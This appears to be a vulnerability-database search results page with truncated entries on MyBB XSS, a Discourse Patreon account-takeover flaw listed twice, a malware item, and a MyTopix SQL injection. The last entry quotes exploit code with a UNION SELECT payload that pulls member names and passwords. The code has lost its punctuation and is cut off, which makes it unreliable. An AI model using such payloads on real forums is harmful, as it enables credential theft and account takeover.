5 matches found
CVE-2019-12830
In MyBB before 1.8.21, an attacker can exploit a parsing flaw in the Private Message / Post renderer that leads to video BBCode persistent XSS to take over any forum account, aka a nested video MyCode issue...
EUVD-2019-4410
Malware in sbrugna...
CVE-2022-39355
Discourse Patreon enables syncronization between Discourse Groups and Patreon rewards. On sites with Patreon login enabled, an improper authentication vulnerability could be used to take control of a victim's forum account. This vulnerability is patched in commit number...
CVE-2022-39355 Discourse Patreon vulnerable to improper validation of email during Patreon authentication
Discourse Patreon enables syncronization between Discourse Groups and Patreon rewards. On sites with Patreon login enabled, an improper authentication vulnerability could be used to take control of a victim's forum account. This vulnerability is patched in commit number...
MyTopix 1.3.0 - SQL Injection
MyTopix 1.3.0 - SQL Injection evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM,...